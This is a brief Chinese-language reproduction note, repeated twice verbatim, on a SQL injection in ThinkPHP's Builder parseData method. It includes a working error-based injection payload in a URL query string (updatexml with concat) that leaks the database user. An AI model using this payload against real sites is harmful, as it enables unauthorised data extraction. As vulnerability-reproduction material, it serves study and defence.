Thinkphp in-sqlinjection复现
原理
在 Builder 类的 parseData 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生
过程
访问时加上下面的playload就可以获取敏感信息
/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
Thinkphp in-sqlinjection复现
原理
在 Builder 类的 parseData 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生
过程
访问时加上下面的playload就可以获取敏感信息
/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1